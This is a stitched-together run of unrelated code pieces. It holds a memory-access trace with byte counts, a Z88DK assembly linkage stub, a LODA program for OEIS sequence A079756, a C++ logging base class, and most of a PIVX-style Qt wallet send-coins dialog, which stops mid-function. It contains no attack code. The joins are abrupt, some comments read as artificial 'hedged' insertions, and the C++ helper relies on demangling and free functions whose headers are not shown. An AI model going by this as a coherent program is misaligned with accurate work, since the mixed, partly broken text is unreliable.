{'src': {'same': True, 'congruent': 0, 'NT': False, 'type': 'addresses_US', 'size': 16, 'AVXalign': True}, 'OP': 'LOAD'}
<gen_prepare_buffer>
{'src': {'same': False, 'congruent': 1, 'NT': False, 'type': 'addresses_WC_ht', 'size': 32, 'AVXalign': False}, 'OP': 'LOAD'}
{'src': {'same': True, 'congruent': 0, 'NT': False, 'type': 'addresses_WC_ht', 'size': 1, 'AVXalign': False}, 'OP': 'LOAD'}
{'src': {'same': False, 'congruent': 9, 'NT': False, 'type': 'addresses_WC_ht', 'size': 1, 'AVXalign': True}, 'OP': 'LOAD'}
{'OP': 'STOR', 'dst': {'same': False, 'congruent': 8, 'NT': False, 'type': 'addresses_normal_ht', 'size': 4, 'AVXalign': False}}
{'src': {'same': False, 'congruent': 9, 'NT': False, 'type': 'addresses_normal_ht', 'size': 16, 'AVXalign': False}, 'OP': 'LOAD'}
{'44': 6101, '00': 14284, '48': 1444}
44 44 00 00 00 00 00 00 00 00 00 00 44 44 00 00 00 00 00 00 48 48 00 00 00 44 00 44 00 00 00 00 00 00 44 44 00 00 44 00 00 00 44 44 00 00 00 44 00 44 00 00 00 00 44 00 00 00 48 00 00 44 00 00 00 00 00 00 48 44 00 00 00 00 00 00 00 00 00 00 00 44 48 44 44 44 00 00 48 44 00 00 00 44 48 00 00 48 44 00 00 00 00 44 00 00 48 00 00 00 44 00 44 00 00 00 00 44 00 00 00 00 44 44 00 00 44 00 00 00 00 00 48 44 44 44 44 44 00 44 00 44 44 00 00 00 00 00 00 44 00 00 00 48 00 00 00 44 44 00 00 00 00 00 44 00 00 00 00 00 00 00 00 44 00 44 00 44 44 00 48 44 00 00 44 44 00 00 00 00 00 00 00 00 00 00 00 44 44 00 00 00 44 00 44 00 44 00 00 00 00 44 00 44 00 00 00 00 00 44 00 00 44 44 00 44 00 00 48 44 00 00 44 00 00 44 00 00 00 00 00 00 44 00 00 00 00 00 44 44 44 44 00 00 00 00 00 44 00 00 44 00 44 00 44 00 00 00 00 00 00 00 00 00 44 00 00 00 44 44 00 00 00 44 44 00 00 44 44 00 00 00 00 00 48 44 44 00 00 00 00 00 00 00 00 44 00 00 00 00 44 00 00 00 44 00 00 00 00 00 44 00 00 44 00 48 44 48 44 44 44 00 00 44 00 00 00 00 44 00 44 00 44 00 48 44 00 00 00 44 44 00 00 00 44 00 00 44 00 44 44 00 44 44 44 00 44 00 00 00 00 00 00 00 44 48 44 00 44 00 00 00 00 00 44 44 00 44 00 00 00 00 00 00 44 44 00 00 00 00 00 00 00 00 00 00 00 44 00 00 00 44 48 00 00 00 44 00 44 00 00 00 00 00 00 00 00 00 00 00 44 00 00 00 44 44 44 44 00 00 44 00 44 00 48 00 48 00 00 00 00 48 00 00 00 00 00 44 00 44 00 00 48 00 00 00 00 00 00 44 00 00 00 00 00 44 00 00 44 00 00 00 00 00 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 48 44 44 00 00 00 00 00 00 00 00 00 44 44 00 00 00 00 00 00 44 00 44 00 44 44 00 44 48 00 00 00 00 00 00 00 00 48 00 00 44 00 00 44 44 00 00 00 00 00 44 00 00 00 00 00 00 44 00 00 00 48 44 00 00 00 00 44 44 44 00 48 44 44 00 00 00 00 00 00 00 00 00 44 44 00 44 00 00 00 00 00 44 44 00 00 00 00 00 00 00 00 44 44 00 00 48 44 44 00 44 44 44 00 00 00 00 00 00 00 00 00 00 00 44 00 00 00 48 00 00 00 00 00 00 00 00 00 48 00 00 00 48 44 48 00 00 00 00 44 44 48 00 48 44 44 44 00 48 44 00 00 48 00 00 00 00 00 44 44 44 44 00 00 00 44 44 00 00 48 44 44 00 44 00 44 00 00 00 44 44 00 00 00 44 00 00 00 48 44 00 00 00 44 00 44 00 44 00 44 00 48 44 00 00 44 48 44 00 48 44 00 00 00 48 44 44 00 00 00 00 44 44 00 00 00 00 00 00 44 44 00 00 00 44 00 00 00 44 44 00 44 44 00 00 44 00 00 48 44 44 00 48 00 44 00 00 44 44 44 00 00 00 00 00 44 00 48 00 48 00 00 00 44 00 00 00 00 44 00 00 00 00 48 00 00 00 00 00 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 44 00 00 48 44 48 44 44 44 00 00 00 00 00 48 00 00 00 44 00 00 48 44 00 44 44 00 44 00 00 00 00 00 00 00 00 00 00 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 44 44 44 00 00 44 44 00 00 00 00 00 00 00 44 00 44 00 00 00 00 00 44 48 44 00 00 48 00 00 00 48 00 44 44 44 00 00 44 44 00 00 00 44 44 44 00 00 00 00 48 44 48 44 00 48 00 00 00 00 00 00 00 44 00 00 00 00 00 44 44 44 00 44 00 00 00 00 00 48 00 00 44 44 44 00 00 00 44 00 00 00 00 00 48 00 00 00 00 44 48 00 00 00 00 00 00 00 44 48 44 00 00 44 00 44 00 00 00 00 00 44 00 00 44 48 44 00 00 00 00 00 00
*/
|
; CALLER linkage for function pointers
XLIB write
LIB write_callee
XREF ASMDISP_WRITE_CALLEE
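; Hedged note: the pop/push pairs below copy the return address (through af)
; and the stacked argument words into bc/de/hl while leaving the stack
; exactly as it was, so the callee sees register copies of the arguments and
; the caller still cleans the stack afterwards (CALLER linkage); control
; then tail-jumps into the callee at its dispatch displacement.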
.write
pop af
pop bc
pop de
pop hl
push hl
push de
push bc
push af
jp write_callee + ASMDISP_WRITE_CALLEE
|
; A079756: Operation count to create all permutations of n distinct elements using the "streamlined" version of Algorithm L (lexicographic permutation generation) from Knuth's The Art of Computer Programming, Vol. 4, chapter 7.2.1.2. Sequence gives number of interchanges in reversal step.
; Submitted by Christian Krause
; 0,0,4,29,215,1734,15630,156327,1719637,20635688,268264004,3755696121,56335441899,901367070474,15323240198170,275818323567179,5240548147776545,104810962955531052,2201030222066152272,48422664885455350173,1113721292365473054199,26729311016771353301006,668232775419283832525414,17374052160901379645661039,469099408344337250432848365,13134783433641443012119754544,380908719575601847351472882140,11427261587268055420544186464577,354245109205309718036869780402307,11335843494569910977179832972874258
mov $2,2
lpb $0
sub $0,1
mov $1,$3
add $2,1
add $1,$2
div $1,2
mul $1,2
sub $1,2
mul $1,$2
add $3,$1
lpe
mov $0,$3
div $0,2
|
/*
* gObject.cpp
*
* Created on: May 16, 2020
* Author: noyan
*/
#include "gObject.h"
#include <unistd.h>
const int gObject::LOGLEVEL_SILENT = 0;
const int gObject::LOGLEVEL_INFO = 1;
const int gObject::LOGLEVEL_DEBUG = 2;
const int gObject::LOGLEVEL_WARNING = 3;
const int gObject::LOGLEVEL_ERROR = 4;
gObject::gObject() {
loglevelname[0] = "Silent";
loglevelname[1] = "Info";
loglevelname[2] = "Debug";
loglevelname[3] = "Warning";
loglevelname[4] = "Error";
loglevel = LOGLEVEL_INFO;
char temp[256];
const char* cwd = getcwd(temp, sizeof(temp)); // getcwd can fail and return NULL
exepath = cwd ? cwd : "";
exepath += "/";
for (int i = 0; i < exepath.size(); i++) {
if (exepath[i] == '\\') {
exepath[i] = '/';
}
}
// std::replace(0, 1, "", "");
}
gObject::~gObject() {
}
std::string gObject::gGetAppDir() {
return exepath;
}
std::string gObject::gGetAssetsDir() {
return exepath + "assets/";
}
std::string gObject::gGetImagesDir() {
return exepath + "assets/images/";
}
std::string gObject::gGetFontsDir() {
return exepath + "assets/fonts/";
}
std::string gObject::gGetModelsDir() {
return exepath + "assets/models/";
}
std::string gObject::gGetSoundsDir() {
return exepath + "assets/sounds/";
}
void gObject::setLogLevel(int logLevel) {
loglevel = logLevel;
}
void gObject::log(int logLevel, std::string tag, std::string message) {
std::cout << "[" << loglevelname[logLevel] << "] " << tag << ": " << message << std::endl;
}
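// Helper (a hedged addition, not part of the original class API):
// abi::__cxa_demangle returns a malloc'd buffer that the caller must free,
// so the demangled name is copied into a std::string and the buffer is
// released to avoid leaking it on every log call.
static std::string demangleTypeName(const char* mangled) {
int status = 0;
char* demangled = abi::__cxa_demangle(mangled, nullptr, nullptr, &status);
std::string name = (status == 0 && demangled) ? demangled : mangled;
std::free(demangled);
return name;
}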
void gObject::logi(std::string tag, std::string message) {
if (loglevel < LOGLEVEL_INFO) return;
log(LOGLEVEL_INFO, tag, message);
}
void gObject::logi(std::string message) {
if (loglevel < LOGLEVEL_INFO) return;
log(LOGLEVEL_INFO, demangleTypeName(typeid(*this).name()), message);
}
void gObject::logd(std::string tag, std::string message) {
if (loglevel < LOGLEVEL_DEBUG) return;
log(LOGLEVEL_DEBUG, tag, message);
}
void gObject::logd(std::string message) {
if (loglevel < LOGLEVEL_DEBUG) return;
log(LOGLEVEL_DEBUG, demangleTypeName(typeid(*this).name()), message);
}
void gObject::logw(std::string tag, std::string message) {
if (loglevel < LOGLEVEL_WARNING) return;
log(LOGLEVEL_WARNING, tag, message);
}
void gObject::logw(std::string message) {
if (loglevel < LOGLEVEL_WARNING) return;
log(LOGLEVEL_WARNING, demangleTypeName(typeid(*this).name()), message);
}
void gObject::loge(std::string tag, std::string message) {
if (loglevel < LOGLEVEL_ERROR) return;
std::cerr << "[" << loglevelname[LOGLEVEL_ERROR] << "] " << tag << ": " << message << std::endl;
}
void gObject::loge(std::string message) {
if (loglevel < LOGLEVEL_ERROR) return;
loge(demangleTypeName(typeid(*this).name()), message);
}
|
// Copyright (c) 2011-2014 The Bitcoin developers
// Copyright (c) 2014-2015 The Dash developers
// Copyright (c) 2015-2018 The PIVX developers
// Copyright (c) 2018 The SKW Core developers
// Distributed under the MIT/X11 software license, see the accompanying
// file COPYING or http://www.opensource.org/licenses/mit-license.php.
#include "sendcoinsdialog.h"
#include "ui_sendcoinsdialog.h"
#include "addresstablemodel.h"
#include "askpassphrasedialog.h"
#include "bitcoinunits.h"
#include "clientmodel.h"
#include "coincontroldialog.h"
#include "guiutil.h"
#include "optionsmodel.h"
#include "sendcoinsentry.h"
#include "walletmodel.h"
#include "base58.h"
#include "coincontrol.h"
#include "ui_interface.h"
#include "utilmoneystr.h"
#include "wallet.h"
#include <QMessageBox>
#include <QScrollBar>
#include <QSettings>
#include <QTextDocument>
SendCoinsDialog::SendCoinsDialog(QWidget* parent) : QDialog(parent),
ui(new Ui::SendCoinsDialog),
clientModel(0),
model(0),
fNewRecipientAllowed(true),
fFeeMinimized(true)
{
ui->setupUi(this);
#ifdef Q_OS_MAC // Icons on push buttons are very uncommon on Mac
ui->addButton->setIcon(QIcon());
ui->clearButton->setIcon(QIcon());
ui->sendButton->setIcon(QIcon());
#endif
GUIUtil::setupAddressWidget(ui->lineEditCoinControlChange, this);
addEntry();
connect(ui->addButton, SIGNAL(clicked()), this, SLOT(addEntry()));
connect(ui->clearButton, SIGNAL(clicked()), this, SLOT(clear()));
// Coin Control
connect(ui->pushButtonCoinControl, SIGNAL(clicked()), this, SLOT(coinControlButtonClicked()));
connect(ui->checkBoxCoinControlChange, SIGNAL(stateChanged(int)), this, SLOT(coinControlChangeChecked(int)));
connect(ui->lineEditCoinControlChange, SIGNAL(textEdited(const QString&)), this, SLOT(coinControlChangeEdited(const QString&)));
// UTXO Splitter
connect(ui->splitBlockCheckBox, SIGNAL(stateChanged(int)), this, SLOT(splitBlockChecked(int)));
connect(ui->splitBlockLineEdit, SIGNAL(textChanged(const QString&)), this, SLOT(splitBlockLineEditChanged(const QString&)));
// SKWX specific
QSettings settings;
if (!settings.contains("bUseObfuScation"))
settings.setValue("bUseObfuScation", false);
if (!settings.contains("bUseSwiftTX"))
settings.setValue("bUseSwiftTX", false);
bool useSwiftTX = settings.value("bUseSwiftTX").toBool();
if (fLiteMode) {
ui->checkSwiftTX->setVisible(false);
CoinControlDialog::coinControl->useObfuScation = false;
CoinControlDialog::coinControl->useSwiftTX = false;
} else {
ui->checkSwiftTX->setChecked(useSwiftTX);
CoinControlDialog::coinControl->useSwiftTX = useSwiftTX;
}
connect(ui->checkSwiftTX, SIGNAL(stateChanged(int)), this, SLOT(updateSwiftTX()));
// Coin Control: clipboard actions
QAction* clipboardQuantityAction = new QAction(tr("Copy quantity"), this);
QAction* clipboardAmountAction = new QAction(tr("Copy amount"), this);
QAction* clipboardFeeAction = new QAction(tr("Copy fee"), this);
QAction* clipboardAfterFeeAction = new QAction(tr("Copy after fee"), this);
QAction* clipboardBytesAction = new QAction(tr("Copy bytes"), this);
QAction* clipboardPriorityAction = new QAction(tr("Copy priority"), this);
QAction* clipboardLowOutputAction = new QAction(tr("Copy dust"), this);
QAction* clipboardChangeAction = new QAction(tr("Copy change"), this);
connect(clipboardQuantityAction, SIGNAL(triggered()), this, SLOT(coinControlClipboardQuantity()));
connect(clipboardAmountAction, SIGNAL(triggered()), this, SLOT(coinControlClipboardAmount()));
connect(clipboardFeeAction, SIGNAL(triggered()), this, SLOT(coinControlClipboardFee()));
connect(clipboardAfterFeeAction, SIGNAL(triggered()), this, SLOT(coinControlClipboardAfterFee()));
connect(clipboardBytesAction, SIGNAL(triggered()), this, SLOT(coinControlClipboardBytes()));
connect(clipboardPriorityAction, SIGNAL(triggered()), this, SLOT(coinControlClipboardPriority()));
connect(clipboardLowOutputAction, SIGNAL(triggered()), this, SLOT(coinControlClipboardLowOutput()));
connect(clipboardChangeAction, SIGNAL(triggered()), this, SLOT(coinControlClipboardChange()));
ui->labelCoinControlQuantity->addAction(clipboardQuantityAction);
ui->labelCoinControlAmount->addAction(clipboardAmountAction);
ui->labelCoinControlFee->addAction(clipboardFeeAction);
ui->labelCoinControlAfterFee->addAction(clipboardAfterFeeAction);
ui->labelCoinControlBytes->addAction(clipboardBytesAction);
ui->labelCoinControlPriority->addAction(clipboardPriorityAction);
ui->labelCoinControlLowOutput->addAction(clipboardLowOutputAction);
ui->labelCoinControlChange->addAction(clipboardChangeAction);
// init transaction fee section
if (!settings.contains("fFeeSectionMinimized"))
settings.setValue("fFeeSectionMinimized", true);
if (!settings.contains("nFeeRadio") && settings.contains("nTransactionFee") && settings.value("nTransactionFee").toLongLong() > 0) // compatibility
settings.setValue("nFeeRadio", 1); // custom
if (!settings.contains("nFeeRadio"))
settings.setValue("nFeeRadio", 0); // recommended
if (!settings.contains("nCustomFeeRadio") && settings.contains("nTransactionFee") && settings.value("nTransactionFee").toLongLong() > 0) // compatibility
settings.setValue("nCustomFeeRadio", 1); // total at least
if (!settings.contains("nCustomFeeRadio"))
settings.setValue("nCustomFeeRadio", 0); // per kilobyte
if (!settings.contains("nSmartFeeSliderPosition"))
settings.setValue("nSmartFeeSliderPosition", 0);
if (!settings.contains("nTransactionFee"))
settings.setValue("nTransactionFee", (qint64)DEFAULT_TRANSACTION_FEE);
if (!settings.contains("fPayOnlyMinFee"))
settings.setValue("fPayOnlyMinFee", false);
if (!settings.contains("fSendFreeTransactions"))
settings.setValue("fSendFreeTransactions", false);
ui->groupFee->setId(ui->radioSmartFee, 0);
ui->groupFee->setId(ui->radioCustomFee, 1);
ui->groupFee->button((int)std::max(0, std::min(1, settings.value("nFeeRadio").toInt())))->setChecked(true);
ui->groupCustomFee->setId(ui->radioCustomPerKilobyte, 0);
ui->groupCustomFee->setId(ui->radioCustomAtLeast, 1);
ui->groupCustomFee->button((int)std::max(0, std::min(1, settings.value("nCustomFeeRadio").toInt())))->setChecked(true);
ui->sliderSmartFee->setValue(settings.value("nSmartFeeSliderPosition").toInt());
ui->customFee->setValue(settings.value("nTransactionFee").toLongLong());
ui->checkBoxMinimumFee->setChecked(settings.value("fPayOnlyMinFee").toBool());
ui->checkBoxFreeTx->setChecked(settings.value("fSendFreeTransactions").toBool());
ui->checkxSKW->hide();
minimizeFeeSection(settings.value("fFeeSectionMinimized").toBool());
}
void SendCoinsDialog::setClientModel(ClientModel* clientModel)
{
this->clientModel = clientModel;
if (clientModel) {
connect(clientModel, SIGNAL(numBlocksChanged(int)), this, SLOT(updateSmartFeeLabel()));
}
}
void SendCoinsDialog::setModel(WalletModel* model)
{
this->model = model;
if (model && model->getOptionsModel()) {
for (int i = 0; i < ui->entries->count(); ++i) {
SendCoinsEntry* entry = qobject_cast<SendCoinsEntry*>(ui->entries->itemAt(i)->widget());
if (entry) {
entry->setModel(model);
}
}
setBalance(model->getBalance(), model->getUnconfirmedBalance(), model->getImmatureBalance(),
0,0,0,
model->getWatchBalance(), model->getWatchUnconfirmedBalance(), model->getWatchImmatureBalance());
connect(model, SIGNAL(balanceChanged(CAmount, CAmount, CAmount, CAmount, CAmount, CAmount, CAmount, CAmount, CAmount)), this,
SLOT(setBalance(CAmount, CAmount, CAmount, CAmount, CAmount, CAmount, CAmount, CAmount, CAmount)));
connect(model->getOptionsModel(), SIGNAL(displayUnitChanged(int)), this, SLOT(updateDisplayUnit()));
updateDisplayUnit();
// Coin Control
connect(model->getOptionsModel(), SIGNAL(displayUnitChanged(int)), this, SLOT(coinControlUpdateLabels()));
connect(model->getOptionsModel(), SIGNAL(coinControlFeaturesChanged(bool)), this, SLOT(coinControlFeatureChanged(bool)));
ui->frameCoinControl->setVisible(model->getOptionsModel()->getCoinControlFeatures());
coinControlUpdateLabels();
// fee section
connect(ui->sliderSmartFee, SIGNAL(valueChanged(int)), this, SLOT(updateSmartFeeLabel()));
connect(ui->sliderSmartFee, SIGNAL(valueChanged(int)), this, SLOT(updateGlobalFeeVariables()));
connect(ui->sliderSmartFee, SIGNAL(valueChanged(int)), this, SLOT(coinControlUpdateLabels()));
connect(ui->groupFee, SIGNAL(buttonClicked(int)), this, SLOT(updateFeeSectionControls()));
connect(ui->groupFee, SIGNAL(buttonClicked(int)), this, SLOT(updateGlobalFeeVariables()));
connect(ui->groupFee, SIGNAL(buttonClicked(int)), this, SLOT(coinControlUpdateLabels()));
connect(ui->groupCustomFee, SIGNAL(buttonClicked(int)), this, SLOT(updateGlobalFeeVariables()));
connect(ui->groupCustomFee, SIGNAL(buttonClicked(int)), this, SLOT(coinControlUpdateLabels()));
connect(ui->customFee, SIGNAL(valueChanged()), this, SLOT(updateGlobalFeeVariables()));
connect(ui->customFee, SIGNAL(valueChanged()), this, SLOT(coinControlUpdateLabels()));
connect(ui->checkBoxMinimumFee, SIGNAL(stateChanged(int)), this, SLOT(setMinimumFee()));
connect(ui->checkBoxMinimumFee, SIGNAL(stateChanged(int)), this, SLOT(updateFeeSectionControls()));
connect(ui->checkBoxMinimumFee, SIGNAL(stateChanged(int)), this, SLOT(updateGlobalFeeVariables()));
connect(ui->checkBoxMinimumFee, SIGNAL(stateChanged(int)), this, SLOT(coinControlUpdateLabels()));
connect(ui->checkBoxFreeTx, SIGNAL(stateChanged(int)), this, SLOT(updateGlobalFeeVariables()));
connect(ui->checkBoxFreeTx, SIGNAL(stateChanged(int)), this, SLOT(coinControlUpdateLabels()));
ui->customFee->setSingleStep(CWallet::minTxFee.GetFeePerK());
updateFeeSectionControls();
updateMinFeeLabel();
updateSmartFeeLabel();
updateGlobalFeeVariables();
}
}
SendCoinsDialog::~SendCoinsDialog()
{
QSettings settings;
settings.setValue("fFeeSectionMinimized", fFeeMinimized);
settings.setValue("nFeeRadio", ui->groupFee->checkedId());
settings.setValue("nCustomFeeRadio", ui->groupCustomFee->checkedId());
settings.setValue("nSmartFeeSliderPosition", ui->sliderSmartFee->value());
settings.setValue("nTransactionFee", (qint64)ui->customFee->value());
settings.setValue("fPayOnlyMinFee", ui->checkBoxMinimumFee->isChecked());
settings.setValue("fSendFreeTransactions", ui->checkBoxFreeTx->isChecked());
delete ui;
}
void SendCoinsDialog::on_sendButton_clicked()
{
if (!model || !model->getOptionsModel())
return;
QList<SendCoinsRecipient> recipients;
bool valid = true;
for (int i = 0; i < ui->entries->count(); ++i) {
SendCoinsEntry* entry = qobject_cast<SendCoinsEntry*>(ui->entries->itemAt(i)->widget());
//UTXO splitter - address should be our own
CBitcoinAddress address = entry->getValue().address.toStdString();
if (!model->isMine(address) && ui->splitBlockCheckBox->checkState() == Qt::Checked) {
CoinControlDialog::coinControl->fSplitBlock = false;
ui->splitBlockCheckBox->setCheckState(Qt::Unchecked);
QMessageBox::warning(this, tr("Send Coins"),
tr("The split block tool does not work when sending to outside addresses. Try again."),
QMessageBox::Ok, QMessageBox::Ok);
return;
}
if (entry) {
if (entry->validate()) {
recipients.append(entry->getValue());
} else {
valid = false;
}
}
}
if (!valid || recipients.isEmpty()) {
return;
}
//set split block in model
CoinControlDialog::coinControl->fSplitBlock = ui->splitBlockCheckBox->checkState() == Qt::Checked;
if (ui->entries->count() > 1 && ui->splitBlockCheckBox->checkState() == Qt::Checked) {
CoinControlDialog::coinControl->fSplitBlock = false;
ui->splitBlockCheckBox->setCheckState(Qt::Unchecked);
QMessageBox::warning(this, tr("Send Coins"),
tr("The split block tool does not work with multiple addresses. Try again."),
QMessageBox::Ok, QMessageBox::Ok);
return;
}
if (CoinControlDialog::coinControl->fSplitBlock)
CoinControlDialog::coinControl->nSplitBlock = int(ui->splitBlockLineEdit->text().toInt());
QString strFunds = "";
QString strFee = "";
recipients[0].inputType = ALL_COINS;
if (ui->checkSwiftTX->isChecked()) {
recipients[0].useSwiftTX = true;
strFunds += " ";
strFunds += tr("using SwiftX");
} else {
recipients[0].useSwiftTX = false;
}
// Format confirmation message
QStringList formatted;
foreach (const SendCoinsRecipient& rcp, recipients) {
// generate bold amount string
QString amount = "<b>" + BitcoinUnits::formatHtmlWithUnit(model->getOptionsModel()->getDisplayUnit(), rcp.amount);
amount.append("</b> ").append(strFunds);
// generate monospace address string
QString address = "<span style='font-family: monospace;'>" + rcp.address;
address.append("</span>");
QString recipientElement;
if (!rcp.paymentRequest.IsInitialized()) // normal payment
{
if (rcp.label.length() > 0) // label with address
{
recipientElement = tr("%1 to %2").arg(amount, GUIUtil::HtmlEscape(rcp.label));
recipientElement.append(QString(" (%1)").arg(address));
} else // just address
{
recipientElement = tr("%1 to %2").arg(amount, address);
}
} else if (!rcp.authenticatedMerchant.isEmpty()) // secure payment request
{
recipientElement = tr("%1 to %2").arg(amount, GUIUtil::HtmlEscape(rcp.authenticatedMerchant));
} else // insecure payment request
{
recipientElement = tr("%1 to %2").arg(amount, address);
}
if (CoinControlDialog::coinControl->fSplitBlock) {
recipientElement.append(tr(" split into %1 outputs using the UTXO splitter.").arg(CoinControlDialog::coinControl->nSplitBlock));
}
formatted.append(recipientElement);
}
fNewRecipientAllowed = false;
// Request unlock only if the wallet was locked or unlocked for mixing only.
// This lets users unlock via walletpassphrase or the menu and make many
// transactions, while an unlock performed through this dialog triggers a
// relock afterwards.
WalletModel::EncryptionStatus encStatus = model->getEncryptionStatus();
if (encStatus == model->Locked ) {
WalletModel::UnlockContext ctx(model->requestUnlock(AskPassphraseDialog::Context::Send_SKW, true));
if (!ctx.isValid()) {
// Unlock wallet was cancelled
fNewRecipientAllowed = true;
return;
}
send(recipients, strFee, formatted);
return;
}
// already unlocked or not encrypted at all
send(recipients, strFee, formatted);
}
void SendCoinsDialog::send(QList<SendCoinsRecipient> recipients, QString strFee, QStringList formatted)
{
// prepare transaction for getting txFee earlier
WalletModelTransaction currentTransaction(recipients);
WalletModel::SendCoinsReturn prepareStatus;
if (model->getOptionsModel()->getCoinControlFeatures()) // coin control enabled
prepareStatus = model->prepareTransaction(currentTransaction, CoinControlDialog::coinControl);
else
prepareStatus = model->prepareTransaction(currentTransaction);
// process prepareStatus and on error generate message shown to user
processSendCoinsReturn(prepareStatus,
BitcoinUnits::formatWithUnit(model->getOptionsModel()->getDisplayUnit(), currentTransaction.getTransactionFee()), true);
if (prepareStatus.status != WalletModel::OK) {
fNewRecipientAllowed = true;
return;
}
CAmount txFee = currentTransaction.getTransactionFee();
QString questionString = tr("Are you sure you want to send?");
questionString.append("<br /><br />%1");
if (txFee > 0) {
// append fee string if a fee is required
questionString.append("<hr /><span style='color:#aa0000;'>");
questionString.append(BitcoinUnits::formatHtmlWithUnit(model->getOptionsModel()->getDisplayUnit(), txFee));
questionString.append("</span> ");
questionString.append(tr("are added as transaction fee"));
questionString.append(" ");
questionString.append(strFee);
// append transaction size
questionString.append(" (" + QString::number((double)currentTransaction.getTransactionSize() / 1000) + " kB)");
}
// add total amount in all subdivision units
questionString.append("<hr />");
CAmount totalAmount = currentTransaction.getTotalTransactionAmount() + txFee;
QStringList alternativeUnits;
foreach (BitcoinUnits::Unit u, BitcoinUnits::availableUnits()) {
if (u != model->getOptionsModel()->getDisplayUnit())
alternativeUnits.append(BitcoinUnits::formatHtmlWithUnit(u, totalAmount));
}
// Show total amount + all alternative units
questionString.append(tr("Total Amount = <b>%1</b><br />= %2")
.arg(BitcoinUnits::formatHtmlWithUnit(model->getOptionsModel()->getDisplayUnit(), totalAmount))
.arg(alternativeUnits.join("<br />= ")));
// Limit number of displayed entries
int messageEntries = formatted.size();
int displayedEntries = 0;
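// Drop entries from the end until at most MAX_SEND_POPUP_ENTRIES remain
// (removeLast() with i-- re-examines the same index); displayedEntries
// ends up as the number of entries kept.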
for (int i = 0; i < formatted.size(); i++) {
if (i >= MAX_SEND_POPUP_ENTRIES) {
formatted.removeLast();
i--;
} else {
displayedEntries = i + 1;
}
}
questionString.append("<hr />");
questionString.append(tr("<b>(%1 of %2 entries displayed)</b>").arg(displayedEntries).arg(messageEntries));
// Display message box
QMessageBox::StandardButton retval = QMessageBox::question(this, tr("Confirm send coins"),
questionString.arg(formatted.join("<br />")),
QMessageBox::Yes | QMessageBox::Cancel,
QMessageBox::Cancel);
if (retval != QMessageBox::Yes) {
fNewRecipientAllowed = true;
return;
}
// now send the prepared transaction
WalletModel::SendCoinsReturn sendStatus = model->sendCoins(currentTransaction);
// process sendStatus and on error generate message shown to user
processSendCoinsReturn(sendStatus);
if (sendStatus.status == WalletModel::OK) {
accept();
CoinControlDialog::coinControl->UnSelectAll();
coinControlUpdateLabels();
}
fNewRecipientAllowed = true;
}
void SendCoinsDialog::clear()
{
// Remove entries until only one left
while (ui->entries->count()) {
ui->entries->takeAt(0)->widget()->deleteLater();
}
addEntry();
updateTabsAndLabels();
}
void SendCoinsDialog::reject()
{
clear();
}
void SendCoinsDialog::accept()
{
clear();
}
SendCoinsEntry* SendCoinsDialog::addEntry()
{
SendCoinsEntry* entry = new SendCoinsEntry(this);
entry->setModel(model);
ui->entries->addWidget(entry);
connect(entry, SIGNAL(removeEntry(SendCoinsEntry*)), this, SLOT(removeEntry(SendCoinsEntry*)));
connect(entry, SIGNAL(payAmountChanged()), this, SLOT(coinControlUpdateLabels()));
updateTabsAndLabels();
// Focus the field, so that entry can start immediately
entry->clear();
entry->setFocus();
ui->scrollAreaWidgetContents->resize(ui->scrollAreaWidgetContents->sizeHint());
qApp->processEvents();
QScrollBar* bar = ui->scrollArea->verticalScrollBar();
if (bar)
bar->setSliderPosition(bar->maximum());
return entry;
}
void SendCoinsDialog::updateTabsAndLabels()
{
setupTabChain(0);
coinControlUpdateLabels();
}
void SendCoinsDialog::removeEntry(SendCoinsEntry* entry)
{
entry->hide();
// If the last entry is about to be removed add an empty one
if (ui->entries->count() == 1)
addEntry();
entry->deleteLater();
updateTabsAndLabels();
}
QWidget* SendCoinsDialog::setupTabChain(QWidget* prev)
{
for (int i = 0; i < ui->entries->count(); ++i) {
SendCoinsEntry* entry = qobject_cast<SendCoinsEntry*>(ui->entries->itemAt(i)->widget());
if (entry) {
prev = entry->setupTabChain(prev);
}
}
QWidget::setTabOrder(prev, ui->sendButton);
QWidget::setTabOrder(ui->sendButton, ui->clearButton);
QWidget::setTabOrder(ui->clearButton, ui->addButton);
return ui->addButton;
}
void SendCoinsDialog::setAddress(const QString& address)
{
SendCoinsEntry* entry = 0;
// Replace the first entry if it is still unused
if (ui->entries->count() == 1) {
SendCoinsEntry* first = qobject_cast<SendCoinsEntry*>(ui->entries->itemAt(0)->widget());
if (first->isClear()) {
entry = first;
}
}
if (!entry) {
entry = addEntry();
}
entry->setAddress(address);
}
void SendCoinsDialog::pasteEntry(const SendCoinsRecipient& rv)
{
if (!fNewRecipientAllowed)
return;
SendCoinsEntry* entry = 0;
// Replace the first entry if it is still unused
if (ui->entries->count() == 1) {
SendCoinsEntry* first = qobject_cast<SendCoinsEntry*>(ui->entries->itemAt(0)->widget());
if (first->isClear()) {
entry = first;
}
}
if (!entry) {
entry = addEntry();
}
entry->setValue(rv);
updateTabsAndLabels();
}
bool SendCoinsDialog::handlePaymentRequest(const SendCoinsRecipient& rv)
{
// Just paste the entry, all pre-checks
// are done in paymentserver.cpp.
pasteEntry(rv);
return true;
}
void SendCoinsDialog::setBalance(const CAmount& balance, const CAmount& unconfirmedBalance, const CAmount& immatureBalance,
const CAmount& zerocoinBalance, const CAmount& unconfirmedZerocoinBalance, const CAmount& immatureZerocoinBalance,
const CAmount& watchBalance, const CAmount& watchUnconfirmedBalance, const CAmount& watchImmatureBalance)
{
Q_UNUSED(unconfirmedBalance);
Q_UNUSED(immatureBalance);
Q_UNUSED(zerocoinBalance);
Q_UNUSED(unconfirmedZerocoinBalance);
Q_UNUSED(immatureZerocoinBalance);
Q_UNUSED(watchBalance);
Q_UNUSED(watchUnconfirmedBalance);
Q_UNUSED(watchImmatureBalance);
if (model && model->getOptionsModel()) {
uint64_t bal = balance;
ui->labelBalance->setText(BitcoinUnits::formatWithUnit(model->getOptionsModel()->getDisplayUnit(), bal));
}
}
void SendCoinsDialog::updateDisplayUnit()
{
TRY_LOCK(cs_main, lockMain);
if (!lockMain) return;
setBalance(model->getBalance(), model->getUnconfirmedBalance(), model->getImmatureBalance(),
0,0,0,
model->getWatchBalance(), model->getWatchUnconfirmedBalance(), model->getWatchImmatureBalance());
coinControlUpdateLabels();
ui->customFee->setDisplayUnit(model->getOptionsModel()->getDisplayUnit());
updateMinFeeLabel();
updateSmartFeeLabel();
}
void SendCoinsDialog::updateSwiftTX()
{
QSettings settings;
settings.setValue("bUseSwiftTX", ui->checkSwiftTX->isChecked());
CoinControlDialog::coinControl->useSwiftTX = ui->checkSwiftTX->isChecked();
